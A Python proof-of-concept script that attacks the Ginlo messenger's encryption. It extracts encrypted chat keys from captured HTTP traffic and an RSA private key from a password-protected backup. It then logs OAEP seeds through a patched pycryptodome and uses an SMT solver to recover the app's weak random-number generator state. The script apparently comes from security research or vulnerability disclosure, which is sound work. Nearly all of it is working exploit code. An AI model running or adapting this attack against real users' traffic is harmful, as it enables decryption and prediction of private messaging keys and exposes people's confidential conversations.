#!.venv/bin/python3.11

# requires 7z to be installed
# please run the below comand to extract the http bodies from the pcap
# $ tshark -r mallory.pcap -T fields -e http.file_data > http_bodies

# Extracting from a pcap because, at least on iOS, the app caches the chat AES
# keys and thus does not run the RSA decryption on every message. That also
# means one can't log the seed used in OAEP encryption.
# Doing the decryption myself seemed simpler than trying to invalidate the app's cache.

import base64
import hashlib
import io
import json
import subprocess
import tempfile
from pathlib import Path
from time import time
import os

from Crypto.Cipher import AES, PKCS1_OAEP
import pyboolector
from pyboolector import Boolector, BoolectorException

HTTP_BODIES = "http_bodies"
BACKUP_ZIP = "ginlo-backup-J967VGD2.zip"
BACKUP_PASSWORD = "a"


def insert_if_not_present(lst, item):
    if item not in lst:
        lst.append(item)


def extract_keys_from_http_bodies():
    bodies = Path(HTTP_BODIES).read_text().splitlines()
    bodies = [bytearray.fromhex(line).decode() for line in bodies if len(line) > 0]
    bodies = [line for line in bodies if not line.startswith("cmd=")]
    bodies = [line for line in bodies if "PrivateMessage" in line]
    json_bodies = []
    for line in bodies:
        try:
            json_bodies.append(json.loads(line))
        except:
            print("Error parsing json:")
            print(line)
            pass

    keys = []
    for b in json_bodies:
        for message in b:
            if isinstance(message, str):
                try:
                    j = json.loads(message)
                except:
                    continue
            else:
                j = message["PrivateMessage"]
            to_dict = j["to"][0]
            t = to_dict[list(to_dict.keys())[0]]
            insert_if_not_present(keys, (j["datesend"], t["key"]))
    return keys


def extract_rsa_keys_from_backup():
    with tempfile.TemporaryDirectory() as tmpdir:
        process = subprocess.Popen(
            ["7z", "x", BACKUP_ZIP, "-o" + tmpdir],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )
        stdout, stderr = process.communicate()
        with open(tmpdir + "/info.json", "r") as infojson:
            info = json.load(infojson)[0]["BackupInfo"]
            salt = info["salt"]
            pbkdf_salt = base64.b64decode(info["pbdkfSalt"])
            pbkdf_rounds = info["pbdkfRounds"]

        with open(tmpdir + "/account.json", "rb") as accountjson:
            account_enc = accountjson.read()

        iv = account_enc[:16]

        password = BACKUP_PASSWORD
        digest = hashlib.pbkdf2_hmac("sha1", password.encode(), pbkdf_salt, 80000, 32)
        cipher = AES.new(digest, AES.MODE_CBC, iv)
        account_dec = cipher.decrypt(account_enc[16:])
        if account_dec[:20] == b'[{"AccountBackup":{"':
            decoded = account_dec.decode("unicode-escape").strip()
            idx = decoded.index("]")
            account_json = json.loads(decoded[: idx + 1])
            account_json = account_json[0]["AccountBackup"]
            privkey = account_json["privateKey"]
            pubkey = account_json["publicKey"]
            return privkey, pubkey
        else:
            print("could not decrypt the backup")
            exit()


##### stackoverflow code
# https://stackoverflow.com/a/77450533
import xml.etree.ElementTree as ET

from Crypto.PublicKey import RSA
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa


def convert_xml_to_pem(private_key_xml_content: str, public_key_xml_content: str):
    # Load private key from XML
    private_key_data = ET.fromstring(private_key_xml_content)
    public_key_data = ET.fromstring(public_key_xml_content)
    inverseQ = int.from_bytes(
        base64.b64decode(private_key_data.find("InverseQ").text), "big"
    )
    modulus = int.from_bytes(
        base64.b64decode(private_key_data.find("Modulus").text), "big"
    )
    p = int.from_bytes(base64.b64decode(private_key_data.find("P").text), "big")
    inverseQmodP = inverseQ % p
    exponent = int.from_bytes(
        base64.b64decode(public_key_data.find("Exponent").text), "big"
    )
    public_numbers = rsa.RSAPublicNumbers(exponent, modulus)
    private_key = rsa.RSAPrivateNumbers(
        p,
        int.from_bytes(base64.b64decode(private_key_data.find("Q").text), "big"),
        int.from_bytes(base64.b64decode(private_key_data.find("D").text), "big"),
        int.from_bytes(base64.b64decode(private_key_data.find("DP").text), "big"),
        int.from_bytes(base64.b64decode(private_key_data.find("DQ").text), "big"),
        inverseQmodP,
        public_numbers,
        # int(private_key_data.find('InverseQ').text, 16)
    ).private_key(default_backend())

    private_key_pem = private_key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.TraditionalOpenSSL,
        encryption_algorithm=serialization.NoEncryption(),
    )

    # Load public key from XML
    # public_key_data = ET.fromstring(public_key_xml_content)
    public_key = public_numbers.public_key(default_backend())

    public_key_pem = public_key.public_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PublicFormat.SubjectPublicKeyInfo,
    )
    return private_key_pem, public_key_pem


from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding

privkey, pubkey = extract_rsa_keys_from_backup()
private_key_pem, public_key_pem = convert_xml_to_pem(privkey, pubkey)
key = RSA.import_key(private_key_pem, passphrase=None)
##### end of stackoverflow code

messages = extract_keys_from_http_bodies()
messages = sorted(messages, key=lambda x: x[0])

count = 0
for m in messages:
    try:
        f = io.StringIO()
        message = base64.b64decode(m[1])
        cipher = PKCS1_OAEP.new(key)
        plain = cipher.decrypt(message)
        # print(m)
        count += 1
    except:
        print("fail")
        pass

print(f"successfully got RNG outputs from messages")
oaep_seeds = bytearray()
# patched the corresponding .py in pycryptodome to save all the seeds to a list:
'''
diff --git a/lib/Crypto/Cipher/PKCS1_OAEP.py b/lib/Crypto/Cipher/PKCS1_OAEP.py
index e87487e..47ec49c 100644	
--- a/lib/Crypto/Cipher/PKCS1_OAEP.py
+++ b/lib/Crypto/Cipher/PKCS1_OAEP.py
@@ -30,6 +30,7 @@ from Crypto.Util.strxor import strxor
 from Crypto import Random
 from ._pkcs1_oaep_decode import oaep_decode

+SEEDS = []

 class PKCS1OAEP_Cipher:
     """Cipher object for PKCS#1 v1.5 OAEP.
@@ -159,6 +160,8 @@ class PKCS1OAEP_Cipher:
             to decrypt using a public key).
         """

+        global SEEDS
+
         # See 7.1.2 in RFC3447
         modBits = Crypto.Util.number.size(self._key.n)
         k = ceil_div(modBits, 8)            # Convert from bits to bytes
@@ -190,6 +193,7 @@ class PKCS1OAEP_Cipher:
         if res <= 0:
             raise ValueError("Incorrect decryption.")
         # Step 4
+        SEEDS.append(seed)
         return db[res:]
'''
for s in PKCS1_OAEP.SEEDS:
    oaep_seeds += s

rng_output = [
    int.from_bytes(oaep_seeds[i : i + 4], byteorder="big")
    for i in range(2 * 20, len(oaep_seeds) - 20 * 20, 4)
]


def z3_next(sym_state, i):
    return sym_state[i] ^ sym_state[i + 103]


NUM_TABLES = 400
# location of the recovered outputs in the stream of numbers
OFFSET = (NUM_TABLES - 100) * 250


def boolector_recover_state_consecutive(outputs):
    """
    outputs: the recovered RNG outputs
    """
    start_time = time()
    btor = Boolector()
    btor.Set_opt(pyboolector.BTOR_OPT_MODEL_GEN, 1)
    solver_states = []
    states_tables_needed = NUM_TABLES
    # the type of the variables
    bvsort32 = btor.BitVecSort(32)
    # 1. create the stream of variables
    for i in range(states_tables_needed * 250):
        solver_states.append(btor.Var(bvsort32, f"R250[{i}]"))

    s_add_time = time()

    # 2. teach the solver the relations between the variables
    for i in range(len(solver_states) - 250):
        btor.Assert(solver_states[i] ^ solver_states[i + 103] == solver_states[i + 250])

    # 3. insert the variables recovered from the received messages
    j = 0
    for i in range(len(outputs) * 2):
        if j >= len(outputs):
            break
        if i % 10 < 5:
            btor.Assert(solver_states[i + OFFSET] == outputs[j])
            j += 1

    print("add time:", time() - s_add_time)

    result = btor.Sat()
    if result == btor.SAT:
        print("time taken :", time() - start_time)
        state = [
            int(solver_states[i].assignment, 2)
            for i in range(states_tables_needed * 250)
        ]
        print("recovered state table:")
        print(state[OFFSET : OFFSET + 250])
    else:
        print("unsat")
        exit()


def reconstruct_state_consecutive():
    # "only" 380 states (76 messages) are needed to recover the state table
    decrypted = rng_output[:375]
    print(f"using {len(decrypted)} 32-bit outputs to recover state table")
    print(f"using {NUM_TABLES} state tables")
    boolector_recover_state_consecutive(decrypted)
    exit()


if __name__ == "__main__":
    reconstruct_state_consecutive()
